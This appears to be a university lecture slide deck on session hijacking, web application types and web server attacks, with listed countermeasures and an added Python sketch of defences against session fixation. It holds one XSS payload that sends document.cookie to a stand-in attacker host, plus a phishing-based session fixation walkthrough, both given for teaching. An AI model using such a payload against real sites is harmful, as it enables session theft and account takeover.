
CritiX

Security Operations and Assurance

Alireza Esfahani, Lecturer in Cyber Security

BSc, MSc, PhD, PG Cert, FHEA, MIEEE, MECSO

University of West London

Week 11

Session Hijacking

CP70044E @2023
Today’s agenda

• Understand session hijacking concepts
• Review session hijacking countermeasures
• Review web application and web server concepts

Recap: The 3-Way Handshake
• If the attacker can anticipate the next sequence and ACK number that Bob will send, he/she can spoof Bob's address and start communicating with the server.

https://sectigostore.com/blog/session-hijacking-attacks-session-hijacking-explained/
What is a Session?
• A session is a series of interactions between two devices.
• Application developers need a way to track state across multiple connections from the same user, rather than asking them to re-authenticate between each click in a web application.
• For example, when you log in to an application, a session is created on the server. This maintains the state and is referenced during any future requests you make.

Session Features
• Sessions remain active while the user remains logged in to the system.
• The session is destroyed when you log out, or after a set period of
inactivity on your end. At that point, the user’s data is deleted from the
allocated memory space.
• Session IDs are a key part of this process. They’re a string, usually random
and alpha-numeric.
• Depending on how the website is coded, you can find them in cookies,
URLs, and hidden fields of websites.

• A URL containing a session ID might look like:

www.mywebsite.com/view/99D5953G6027693

• On an HTML page, a session ID may be stored as a hidden field:

<input type="hidden" name="sessionID" value="19D5Y3B">
Session Challenges

• While Session IDs are quite useful, there are also potential security
problems associated with their use.
• If someone gets your session ID, they can essentially log in to your account
on that website.
• One common issue is that many sites generate session IDs based on
predictable variables like the current time or the user’s IP address, which
makes them easy for an attacker to determine.
• Another issue is that without SSL/TLS, they are transmitted in the open, are susceptible to eavesdropping, and can leave you exposed to session hijacking.
What is Session Hijacking?
• Session hijacking refers to an attack where an attacker takes over a valid TCP communication session between two computers.
• Since most authentication only occurs at the start of a TCP session, this allows the attacker to gain access to a machine.
• Attackers can sniff all the traffic from the established TCP sessions and perform identity theft, information theft, fraud, etc.
• The attacker steals a valid session and uses it to authenticate himself with the server.
Common Methods of Session Hijacking
• Brute Force
• Session Sniffing
• Cross-Site Scripting
• Session Fixation
• Malware
Session Fixation
• This type of attack relies on a website accepting session IDs from URLs, most often delivered via phishing attempts.
• For instance, an attacker emails a link to a targeted user that contains a particular session ID. When the user clicks the link and logs in to the website, the attacker knows which session ID is being used.
• That session ID can then be used to hijack the session.
Session Fixation Example
• An attacker determines that http://www.unsafewebsite.com/ accepts
any session identifier and has no security validation.
• The attacker sends the victim a phishing email, saying “Hello Mark,
check out this new account feature from our bank.” The link directs the
victim to http://unsafewebsite.com/login?SID=123456.
• In this case, the attacker is attempting to fixate the session ID to
123456.
• The victim clicks on the link and the regular login screen pops up. The
victim logs on as normal.
• The attacker can now visit http://unsafewebsite.com/?SID=123456 and
have full access to the victim’s account.

Session Sniffing
• Session sniffing is when a hacker employs a packet sniffer, such as Wireshark, to intercept and log packets as they flow across a network connection.
• Session cookies are part of this traffic, and session sniffing allows an attacker to find and steal them.
• A common vulnerability that leaves a site open to session sniffing is when SSL/TLS encryption is only used on login pages.
• Public Wi-Fi networks are especially vulnerable to this type of session hijacking attack.
Cross-Site Scripting
• A cross-site scripting (XSS) attack fools the user's machine into executing malicious code.
• When the script runs, it lets the hacker steal the cookie.
• Server or application vulnerabilities are exploited to inject client-side scripts (usually JavaScript) into webpages, leading the browser to execute the code when it loads the compromised page.
• An example of a cross-site scripting attack to execute session hijacking would be when an attacker sends out emails with a special link to a known, trusted website:

http://www.yourbankswebsite.com/search?<script>location.href='http://www.evilattacker.com/hijacker.php?cookie='+document.cookie;</script>

• Here the document.cookie command would read the current session cookie and send it to the attacker via the location.href command.
• This is a simplified example, and in a real-world attack the link would most likely employ character encoding and/or URL shortening to hide the suspicious portions of the link.
Malware
• Hackers design the malware to perform packet sniffing and set it to specifically look for session cookies. When it finds one, it steals it and sends it to the attacker. The malware is essentially carrying out an automated session sniffing attack on the user.
• Another, more direct method of stealing session IDs is to gain access to the user's machine, whether via malware or by directly connecting to it locally or remotely. The attacker can then navigate to the browser's temporary local storage folder, or "cookie jar", and take whichever cookie they want.
Brute Force
• A hacker can attempt to determine the session ID on their own.
• First, they can try to guess the session ID. This can be successful if the session ID is based on an easily predictable variable such as the user's IP address or the current time or date.
• A brute force attack can also be used, in which an attacker attempts to use various session IDs over and over again from a set list. This is really only a feasible means of session hijacking if the session ID format consists of a relatively short number of characters.
How to Prevent Session Hijacking
• Use HTTPS on your entire site
• Use the Secure cookie flag
• Use long and random session IDs
• Regenerate the session ID after login
• Change the cookie value
• Log out when you're done
• Use anti-malware
• Do not accept session IDs from GET/POST variables
• Destroy suspicious referrers
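The session fixation example and the countermeasures listed above, pulled together in an added Python sketch that is not from the slides or any named project: session IDs come from the OS CSPRNG, are read only from the Cookie header (never from a ?SID= query), are regenerated at login, and are issued with the Secure and HttpOnly flags. SessionStore and the helper names are hypothetical.

```python
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "sessionID"   # same name as the hidden field shown earlier in the deck
SESSION_ID_BYTES = 32       # 32 random bytes -> 43-character URL-safe ID


class SessionStore:
    """Hypothetical in-memory session table: session ID -> {"user": name or None}."""

    def __init__(self):
        self._sessions = {}

    def new_session(self):
        # Long, random ID from the OS CSPRNG; never derived from time or client IP,
        # so it cannot be predicted or brute-forced in practice.
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None

    def login(self, sid, username):
        # Regenerate the ID at login: the pre-login ID (possibly fixated through
        # a phishing link) is discarded, so knowing it gives the attacker nothing.
        self._sessions.pop(sid, None)
        new_sid = self.new_session()
        self._sessions[new_sid]["user"] = username
        return new_sid

    def logout(self, sid):
        # Destroy the server-side state so a captured ID cannot be replayed later.
        self._sessions.pop(sid, None)


def session_id_from_request(headers, query_params):
    """Read the session ID from the Cookie header only; ?SID=... is never honoured."""
    del query_params  # may carry an attacker-chosen SID; deliberately ignored
    cookie = SimpleCookie()
    cookie.load(headers.get("Cookie", ""))
    morsel = cookie.get(COOKIE_NAME)
    return morsel.value if morsel else None


def set_cookie_header(sid):
    # Secure: only sent over HTTPS, so it cannot be sniffed on plain-HTTP pages.
    # HttpOnly: not readable via document.cookie, which blunts the XSS theft above.
    # SameSite: not attached to cross-site requests.
    return f"{COOKIE_NAME}={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"
```

Replaying the slide's scenario against this store: the victim arrives with ?SID=123456, the server ignores it and issues its own ID, and after login the attacker's fixated value resolves to no user at all.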

WEB APPLICATIONS AND WEB SERVER CONCEPTS
Web Application
Most people often confuse web applications and websites.
• A web application is a type of software designed to operate within a web browser.
• Businesses have to exchange information and deliver services remotely.
• To achieve this efficiently and securely, businesses leverage web applications to establish convenient and secure connections with their customers.

https://www.shno.co/blog/web-application-examples
Types of web applications
• Static web application
• Dynamic web application
• Progressive web apps
• Single-page web application
• Portal web apps
• Animated web applications
Static web application
• Static web apps appear to the clients the same as they are stored on the server.
• Languages: HTML, JavaScript, etc.
• Animated objects, GIFs, videos.
• However, it is hard to make updates.
• Example: professional portfolios, digital resumes.

https://www.gurutechnolabs.com/types-of-web-applications/
Dynamic web application
• It is one of the best web application types, as they fetch data in real time based on the users' requests.
• It requires a database to store data, and its content is continuously updated every time users access it.
• Languages: Node.js, Laravel, Ruby on Rails, jQuery, HTML, CSS, PHP, ASP.NET, Perl, Python, etc.
• Example: YouTube, Netflix, Hubspot
Single-page web application
• Single-page apps make it easy for users to use a webpage smoothly.
• This happens because the webpage can quickly send and receive small amounts of data, making everything work well together.
• Languages: HTML, CSS, PHP, ASP.NET, Perl, Python, etc.
• Example: Gmail, PayPal
Multi-page web application
• They are websites that consist of multiple interconnected pages, each serving a specific purpose or presenting distinct content.
• Unlike single-page applications (SPAs), which load content dynamically without full-page refreshes, multi-page applications navigate between distinct URLs.
• Example: Amazon, eBay
Animated web application
• Animated web applications are closely connected with Flash technology. By creating these types of web apps, you can present content using various animated effects.
Portal web application
• A portal is a type of web app in which various sections or categories are accessible from the home page. This page consists of various components such as chats, emails, forums, user registration, etc.
Progressive web application
• Progressive web apps enable you to enhance the mobile web experience and provide your services to users despite slow or unreliable internet connections.
How Web Applications Work

Web Application Architecture

Web Servers
• A web server is a computer that hosts web pages, making them accessible online. When a user loads a site, the web server retrieves the relevant files and sends them to the browser so the user can interact with them.
• Web servers are differentiated by:
  • Operating system support
  • Server-side technologies
  • Security models
  • Client support
  • Development tools
How do Web Servers work?
• When someone wants to load a website, the browser will look for the web server hosting
the site’s files.
• To achieve this, the web browser translates the site’s domain name into an IP address via
the Domain Name System (DNS). If the site is frequently visited, the web browser will
search through its file cache.
• After finding the corresponding web server, the browser sends an HTTP request to
retrieve site content.
• The web server receives and processes the HTTP request through its HTTP server. Once
the HTTP server accepts the request, it will search through the database to obtain the
relevant data.
• Finally, the server returns the files to the web browser and delivers them to users.

https://www.hostinger.co.uk/tutorials/what-is-a-web-server

HTTP request/response
• User of the client machine types in a URL (client: Netscape; server: Apache):

http://www.smallco.com/index.html

• Server name is translated to an IP address via DNS:

http:// www.smallco.com /index.html
192.22.107.5

• Client connects to the server using the IP address and port number (NB port 80 is the default):

client (Netscape) -> 192.22.107.5 port 80 -> server (Apache)

• Client sends an HTTP request to the server:

GET index.html HTTP/1.1

Web server basics
• Server determines which file to send:

"index.html" is really /etc/httpd/htdocs/index.html

• Server sends the response code and the document:

HTTP/1.1 200 OK
Content-type: text/html
[contents of index.html]
Web Server Features
• File logging. Log files track any events or activities a web server performs, such as
requests, security, and error logs.
• Authentication. It often involves asking web users to provide a username and password.
• Bandwidth limiting. Bandwidth limiting controls the speed of responses to ensure that a
network can deliver files smoothly.
• Storage space. It refers to the amount of disk space available to store files.
• Load balancing. The purpose of load balancing is to minimize response times and
prevent server overload.
• Uptime guarantee. Server uptime tracks how long a web server remains operational to
process requests and deliver files. It directly impacts a hosted website’s availability. The
industry standard is a 99.9% guarantee.

Actors
• There are three types of individuals (actors) who will be interacting with a web server.
• System Administrator: concerned with the safety, security, and functioning of the web server from an operational standpoint.
• Network Administrator: concerned with the infrastructure and functioning of the network itself as a whole.
• End users: interact with the web server and application as a consumer and user of information.

Web Servers in the Market
• Apache HTTP Server
• NGINX
• IIS
• Lighttpd
Apache Web Server
• A free and open-source web server used for many operating systems, including
Windows, Linux, and macOS. Apache is one of the most popular choices among
website owners, developers, and hosting providers, with a market share of over
31%.
• The modules supported by Apache include:
• Authentication
• SSL support
• TLS support
• PHP
• HTTP request filtering

Internet Information Server (IIS)
• Developed by Microsoft, IIS is widely used on Windows operating systems. It supports Active Server Pages (ASP), a server-side scripting technology developed by Microsoft for creating dynamic and interactive web applications.
• Very similar to Apache, it is a flexible, secure, and easy-to-manage web server for hosting anything on the web.
NGINX
• Initially designed only for HTTP web serving, this open-source
software now also serves as a reverse proxy, HTTP load balancer,
and email proxy. NGINX is known for its speed and ability to handle
multiple connections, making it suitable for high-traffic websites.

Lighttpd
• A free and open-source web server software known for its fast data
processing with less CPU power. Lighttpd is also popular for its
small memory footprint, allowing the server to handle more
requests while maintaining responsiveness and performance.

WEB SERVER ATTACKS

DoS/DDoS Attacks
• Attackers may send numerous fake requests to the web server, which results in the web server crashing or becoming unavailable to legitimate users.
DNS Server Hijacking
• The attacker compromises the DNS server and changes the DNS settings so that all the requests coming toward the target web server are redirected to their own malicious server.
Man-in-the-Middle/Sniffing Attack
• An MITM attack allows an attacker to access sensitive information by intercepting and altering communications between an end user and web servers.
• The attacker acts as a proxy such that all the communication between the user and the web server passes through him.
Phishing Attacks
• The attacker tricks the user into submitting login details to a website that looks legitimate but actually redirects them to a malicious website hosted on the attacker's web server.
• The attacker steals the credentials entered and uses them to impersonate the legitimate user on the website hosted on the legitimate target server.
• The attacker can then perform unauthorised or malicious operations against the website on the target server.
Summary
• Understanding of Session Hijacking Techniques
• Implementation of Session Hijacking Prevention Measures

Thank you very much!

See you next year